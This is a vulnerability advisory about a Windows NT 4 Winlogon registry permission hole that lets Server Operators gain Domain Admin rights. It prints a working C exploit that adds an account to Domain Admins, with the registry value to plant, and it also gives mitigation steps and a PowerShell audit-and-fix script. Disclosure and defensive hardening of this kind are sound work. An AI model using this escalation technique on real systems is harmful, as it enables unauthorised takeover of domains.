COMMAND

    winlogon registry key

SYSTEMS AFFECTED

    Win NT

PROBLEM

    mnemonix found the following.  There is an interesting hole in the
    Winlogon registry key on NT 4 that allows a member of the  "Server
    Operators" group  to elevate  to both  local and  global  (domain)
    Administrator level.  The permissions on the following  registry
    key grant "Server Operators" Special Access, and part of that
    access is the "Set Value" permission:

        HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

    One of the pre-existing values under this key is

        System:REG_SZ:lsass.exe

    A server operator may change this value to whatever they wish in an
    effort to gain Admin rights: anything placed here is run by Winlogon
    with System privileges.  There are, however, a couple of  practical
    problems.  Firstly, any executable run from here is non-interactive,
    so there is no point in launching usrmgr.exe or cmd.exe.   Secondly,
    any executable run from here with arguments appears to  fail,  e.g.
    "cmd.exe /c copy file.ext newfile.ext".  Thirdly, the SAM appears to
    be locked read-only  for a short  time after the  SAS keystroke
    (Ctrl+Alt+Del) is entered.  What is needed, then, is an  executable
    that takes no arguments, pauses long enough for the SAM  to  become
    writable again, and then grants the attacker local and domain Admin
    rights.  The following  code meets  those requirements.   Replace
    "acc_name" with the relevant account name.

    /* GetadmforSops.exe - David Litchfield 11 Jan 1999 */
    /* Compile with eg Visual C++ and link with netapi32.lib */

    #define UNICODE
    #include <windows.h>
    #include <stdio.h>
    #include <wchar.h>
    #include <lm.h>       /* NetGroupAddUser, NERR_Success */

    int __cdecl wmain (void)
    {
     LPWSTR group = L"Domain Admins";
     LPWSTR acc   = L"acc_name";   /* replace with the account to elevate */

     NET_API_STATUS nas = 0;

     /* Wait three minutes so Winlogon's temporary read-only hold on the
        SAM (taken after the SAS keystroke) has been released. */
     Sleep(180000);

     /* NULL server name = this machine (the domain controller). */
     nas = NetGroupAddUser(NULL, group, acc);
     if (nas == NERR_Success)
     {
      wprintf(L"Success");
      return 0;
     }
     return (int)nas;   /* non-zero NET_API_STATUS on failure */
    }

    Set the System value to:

        System:REG_SZ:lsass,c:\FULL_PATH_TO\getadmforsops.exe

    and reboot the system.  Three minutes later "acc_name" is made a
    member of the "Domain Admins" group, which by default is in turn a
    member of the local Administrators group.

SOLUTION

    If you can trust your "Server Operators" then you don't need to do
    much.  If you'd prefer to be safer, however, remove the "Set Value"
    permission for Server Operators from this key.  This was tested on
    NT 4 Service Pack 3 with hotfixes, though it will almost certainly
    work on NT 4 with SP4 unless the service pack changes the
    permissions on the Winlogon registry key.

    Actually,  this  issue  is  documented  in the whitepaper entitled
    "Security Windows NT Installation", available at this URL:

        http://www.microsoft.com/ntserver/security/exec/overview/Secure_NTInstall.asp

    "In the environments where members of server operators are not
    sufficiently trusted, it is recommended that security on following
    keys be changed as below:

    Registry Key                                  Recommended Permissions

    HKEY_LOCAL_MACHINE\Software\Microsoft         CREATOR OWNER:  Full Control
    \Windows NT\CurrentVersion\Winlogon           Administrators: Full Control
                                                  SYSTEM:         Full Control
                                                  Everyone:       Read"
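    The following script is an added example, not part of the original
    advisory or of the Microsoft whitepaper.  It performs the two checks
    a practitioner would want from the SOLUTION section and the table
    above: it looks for a tampered "System" value under the Winlogon key
    (the artifact the technique leaves behind), and it lists every ACE
    that grants "Set Value" to a principal other than SYSTEM,
    Administrators and CREATOR OWNER.  With the -Fix switch (a name
    chosen for this script) it downgrades such ACEs to Read, as the
    whitepaper recommends.  It assumes a current Windows host with
    PowerShell 5 or later and an elevated session; PowerShell did not
    exist on NT 4, so this is a modern restatement of the check, not
    something that could have been run on the original system.

```powershell
# Audit (and optionally tighten) permissions on the Winlogon key.
# Added example; -Fix, $trusted and the function names are this script's own.
param([switch]$Fix)

$keyPath  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$setValue = [int][System.Security.AccessControl.RegistryRights]::SetValue

# Principals the whitepaper allows Full Control; everyone else should be Read only.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER')

function Test-WinlogonSystemValue {
    # The System value should name only lsass.exe; an appended
    # ",c:\path\to\something.exe" is exactly what the technique plants.
    $v = (Get-ItemProperty -Path $keyPath -Name 'System' -ErrorAction SilentlyContinue).System
    if ($null -ne $v -and $v -ne 'lsass.exe') {
        Write-Warning "Winlogon 'System' value is '$v' (expected 'lsass.exe')"
        return $false
    }
    return $true
}

function Get-WinlogonWriteAce {
    # Every Allow ACE carrying SetValue for a principal outside $trusted.
    $acl = Get-Acl -Path $keyPath
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.RegistryRights -band $setValue) -ne 0) -and
        ($trusted -notcontains $_.IdentityReference.Value)
    }
}

[void](Test-WinlogonSystemValue)
$offending = @(Get-WinlogonWriteAce)
foreach ($ace in $offending) {
    Write-Warning ("{0} holds {1} on Winlogon" -f $ace.IdentityReference, $ace.RegistryRights)
}

if ($Fix -and $offending.Count -gt 0) {
    $acl = Get-Acl -Path $keyPath
    foreach ($ace in $offending) {
        if ($ace.IsInherited) {
            # Inherited ACEs cannot be removed here; fix them on the parent key.
            Write-Warning "ACE for $($ace.IdentityReference) is inherited; fix it on the parent key"
            continue
        }
        # Drop the write-capable ACE and replace it with plain Read, matching
        # the "Everyone: Read" line of the recommended permissions.
        [void]$acl.RemoveAccessRuleSpecific($ace)
        $readOnly = [System.Security.AccessControl.RegistryAccessRule]::new(
            $ace.IdentityReference, 'ReadKey',
            $ace.InheritanceFlags, $ace.PropagationFlags, 'Allow')
        $acl.AddAccessRule($readOnly)
    }
    Set-Acl -Path $keyPath -AclObject $acl
}
```

    Run it without -Fix first and review the warnings: on a domain
    controller the entry to expect is "BUILTIN\Server Operators".  The
    script deliberately does not touch the SYSTEM, Administrators and
    CREATOR OWNER ACEs, since the recommended permissions keep those at
    Full Control.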